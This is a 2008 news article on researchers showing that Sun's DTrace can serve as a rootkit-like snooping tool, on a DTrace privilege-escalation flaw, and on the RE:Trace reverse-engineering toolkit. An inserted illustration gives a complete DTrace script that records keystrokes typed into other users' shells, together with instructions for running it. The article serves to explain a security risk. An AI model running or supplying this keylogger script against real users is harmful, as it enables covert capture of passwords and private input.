Researchers Show Sun's DTrace Can Also Work as a Rootkit Tool
DTrace, the dynamic tracing software Sun developed, was built primarily to help monitor Sun's Solaris Operating System (OS). But two researchers have shown how it can be turned into a rootkit-like toolkit usable for both defensive and offensive security work.
David Weston and Tiller Beauchamp, two researchers at SAIC (Science Applications International Corp., an engineering company), presented their results at the Black Hat conference held in Washington, D.C., on February 18-21, 2008, SCMagazineUS reported on February 26, 2008.
DTrace is a powerful tracing and event-logging utility integrated into the Solaris OS. It lets system administrators instrument a running system to gather statistics, debug problems, measure system performance, and analyze program execution.
According to FrSIRT, the vulnerability found in Sun Solaris could be exploited by local attackers to gain access to sensitive information. The issue stems from an unspecified error in DTrace's dynamic tracing framework that lets a local user, including one in a non-global zone, who holds only the dtrace_proc (PRIV_DTRACE_PROC) or dtrace_user (PRIV_DTRACE_USER) privilege perform kernel-level tracing, which should require the separate dtrace_kernel privilege, and thereby read sensitive information.
DTrace on its own is not harmful, but combined with certain utilities it can produce harmful results. For example, someone could use it for "snooping", such as intercepting what a user types at the keyboard without that user's knowledge, exactly what a keylogger does, the researchers said.
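To make the kind of "snooping" the researchers describe concrete, here is an added illustration in DTrace's D language (not code from the SAIC talk, from RE:Trace, or from the article), written in the style of the public DTraceToolkit's shellsnoop script: it watches read(2) calls on standard input made by interactive shells and prints whatever the user typed. The list of shell names is an assumption. On a default Solaris system the syscall provider, and copyin() against other users' processes, require the dtrace_kernel privilege, which is why the privilege flaw described above matters.

```d
#!/usr/sbin/dtrace -s
/*
 * Added illustration, not from the article or the SAIC researchers.
 * Prints the bytes that interactive shells read from file descriptor 0,
 * i.e. what the user is typing.  The execname list is an assumption.
 */
#pragma D option quiet

dtrace:::BEGIN
{
    printf("%-16s %-6s %-5s %s\n", "EXEC", "PID", "BYTES", "DATA");
}

/* Remember the user buffer of every read() on stdin issued by a shell. */
syscall::read:entry
/arg0 == 0 && (execname == "bash" || execname == "ksh" ||
               execname == "sh"   || execname == "csh")/
{
    self->buf = arg1;
}

/* On return arg0 is the byte count; copy that many bytes out of the caller. */
syscall::read:return
/self->buf != 0 && arg0 > 0/
{
    printf("%-16s %-6d %-5d %s\n", execname, pid, arg0,
        stringof(copyin(self->buf, arg0)));
    self->buf = 0;
}

/* Failed or empty read(): just drop the saved buffer address. */
syscall::read:return
/self->buf != 0/
{
    self->buf = 0;
}
```

Run it as root (or any user holding dtrace_kernel) with `dtrace -s snoop.d` and stop it with Ctrl-C. Nothing is installed on disk and no process is modified, which is the "friendly rootkit" point: the observation capability is already part of the OS, so the only real control is who holds the DTrace privileges.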
Weston described DTrace as a friendly rootkit because it lets the user see everything that happens during an operation, SCMagazineUS reported.
Weston praised DTrace as an immensely useful platform. But what he and Beauchamp mainly wanted, he said, was a reverse-engineering tool, and DTrace alone lacked what was needed to reverse-engineer a program in search of vulnerabilities.
Weston and Beauchamp have therefore built a toolkit they call RE:Trace, which they describe as a 'high-level' tool. It is built around a Ruby wrapper for DTrace that, they say, overcomes these shortcomings of DTrace.
SPAMfighter News, 01-03-2008